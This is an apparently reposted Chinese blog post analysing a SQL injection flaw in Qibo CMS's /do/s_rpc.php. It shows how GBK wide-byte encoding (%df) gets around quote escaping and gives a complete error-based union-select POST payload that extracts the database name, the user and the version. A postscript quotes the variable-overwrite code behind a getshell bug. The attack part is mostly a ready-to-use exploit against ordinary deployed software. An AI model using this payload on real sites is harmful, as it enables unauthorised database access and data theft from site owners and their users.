齐博cms注入—分析

from http://hi.baidu.com/seo0775/item/294bfc9e77827ff32816473a

这洞是今年年初时,360大张旗鼓的放信息出来,搞得全网络都是这信息,但EXP没人放出来(我是专门找点先人牙慧,,,)。因为今天公司刚好有个客户站点是用齐博门户系统5.0。到网上下载好了几个这个版本,解压出来时居然要密码,我X他大爷的。索性就看我之前下载的齐博cms看一下代码吧。
根据360给出的提示,/do/s_rpc.php文件queryString没过滤。

 

代码如图所示,queryString没过滤,就入库了,是不是很简单啊?直接写EXP?+union+select+…
这里有个问题得说明一下,’%等符号会被转义,常规EXP是不是就没用了?
因为齐博提供了个Chinese类,是把UTF8转换成GB2312,屌丝们的希望又来了。
去年闹得很火的宽字节注入”%df”。

 

OK,咱们来构造EXP:

POST

queryString=By—Mr.x%df’+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+concat(0x3a,database(),0x3a,user(),0x3a,version())))a+from+information_schema.tables+group+by+a)b#

 
PS:国庆节爆的getshell漏洞,之前是看大牛们的分析,自己没具体看,今天认真看了下,变量覆盖的代码是在/inc/common.inc.php
foreach($_COOKIE AS $_key=>$_value){
unset($$_key);
}
foreach($_POST AS $_key=>$_value){
!ereg(“^\_[A-Z]+”,$_key) && $$_key=$_POST[$_key];
}
foreach($_GET AS $_key=>$_value){
!ereg(“^\_[A-Z]+”,$_key) && $$_key=$_GET[$_key];
}
别想不明白了。

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录